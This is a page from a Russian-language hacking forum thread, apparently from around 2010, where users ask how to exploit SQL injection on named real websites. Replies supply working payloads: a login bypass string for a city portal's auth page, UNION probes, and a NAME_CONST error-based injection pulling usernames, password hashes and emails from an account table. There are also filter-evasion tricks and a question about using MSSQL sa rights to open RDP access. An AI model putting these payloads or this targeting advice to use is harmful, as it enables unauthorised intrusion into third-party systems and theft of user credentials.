Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. гаррет-тень

    Joined:
    21 Dec 2009
    Messages:
    67
    Likes Received:
    2
    Reputations:
    0
    я отправляю этот файл(это у меня txt файл) открываю его прямо в maile и он открывает только код.
     
  2. ZavuloN

    ZavuloN New Member

    Joined:
    27 Feb 2007
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    А чего ты собственно хотел? Это конечно интересно отправлять файл и ждать что он выполнится... Учи матчасть, потом заходи.
     
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Какой еще слеш? Я, вроде, нормально сказал, обрезается двоеточие, обычным str_replace(), а ты стал про винду, про слеши, про регулярки придумывать.
     
  4. ronald

    ronald Elder - Старейшина

    Joined:
    27 Mar 2008
    Messages:
    252
    Likes Received:
    42
    Reputations:
    6
    Друзья, как можно использовать ошибку здесь http://disput.mrsu.ru/art/59/?&comact=0
    Если ввести там к примеру, кавычку, то выводится нечто подобное:
     
  5. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    вот интересует вопрос по поводу sql inj, как можно добавит имя польз и пасс на удаленого рабочего стола через реестр. Тоесть как примерно составит запрос к базе данных (MSSQL Server 2000) чтоб в последуюшем открыть доступ к RDP
    есть привелегия sa
     
    #10945 YuNi|[c, 5 Jan 2010
    Last edited: 5 Jan 2010
  6. ronald

    ronald Elder - Старейшина

    Joined:
    27 Mar 2008
    Messages:
    252
    Likes Received:
    42
    Reputations:
    6
    Посмотри, может поможет чем-нибудь:
    http://www.xakep.ru/post/50234/
     
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Впиши в поле имя:
    И по структуре запроса в поле "com_text" запишется concat_ws(0x3a,user(),database(),version()), тобишь юзер:БД:версия
     
    #10947 mailbrush, 5 Jan 2010
    Last edited: 5 Jan 2010
  8. Bagamut

    Bagamut New Member

    Joined:
    26 Feb 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    подскажите, как можно скачать себе на комп базу?
     
  9. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    http://www.mysql.ru/docs/man/mysqldump.html
     
    3 people like this.
  10. recfrf

    recfrf Member

    Joined:
    22 Aug 2008
    Messages:
    21
    Likes Received:
    6
    Reputations:
    0
    Подскажите как быть при такой скуле
    ордером кол-во полей показывает, при вводе
    .php?id=5+union+select+1,2-- принт полей не выводит, если сменить id на произвольный например 999, то приписывает id к названию таблицы и выдает ошибку, например Table 'sjc5292.table_999' doesn't exist, куда копать?
     
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Ты о чем?
     
  12. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    спасибо то что надо
     
  13. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91
    count(*) замени на count(0).
    rand(0)*2 замени на rand(0)/(1/2).
     
    1 person likes this.
  14. aktlek

    aktlek New Member

    Joined:
    5 Jan 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    как узнать платформу интернет ресурса?
     
  15. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    1) Найти phpinfo();
    2) ошибка
    3) ответ сервера


    Крутой хакер-кодер писал для этого тулзу какую-ту :D
     
  16. ronald

    ronald Elder - Старейшина

    Joined:
    27 Mar 2008
    Messages:
    252
    Likes Received:
    42
    Reputations:
    6
    друзья, помогите пожалуйста, как можно заюзать SQL-иньекцию на данной странице авторизации http://pro-ilyichevsk.com/cms/!auth.php .
     
  17. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    логин: ' or '1'='1
    пароль: ' or '1'='1

    P.S шелл в личку отправил :D
     
    #10957 .:[melkiy]:., 6 Jan 2010
    Last edited: 6 Jan 2010
    1 person likes this.
  18. KNR

    KNR Member

    Joined:
    30 Oct 2009
    Messages:
    25
    Likes Received:
    7
    Reputations:
    0
    Code:
    localhost/index.php?modul=char&id=1062197)+and+1=(select+*+from(select+*+from(select+name_const((select+concat(username,0x3a,sha_pass_hash,0x3a,gmlevel,0x3a,email)+from+realmd.account+where+id=12),14)d)+as+t+join+(select+name_const((select+concat(username,0x3a,sha_pass_hash,0x3a,gmlevel,0x3a,email)+from+realmd.account+where+id=12),14)e)b)a)--+
    Чем можно заменить name_const ?
    Code:
    Notice: Incorrect arguments to NAME_CONST in /var/www/web3/web/modules/char.php on line 8
    пишет
     
  19. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    версия php?

    UPD: http://bugs.mysql.com/bug.php?id=27545
     
    #10959 .:[melkiy]:., 6 Jan 2010
    Last edited: 6 Jan 2010
    2 people like this.
  20. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    https://forum.antichat.ru/showpost.php?p=1778081&postcount=15
    https://forum.antichat.ru/showpost.php?p=1788440&postcount=19
     
    8 people like this.
Thread Status:
Not open for further replies.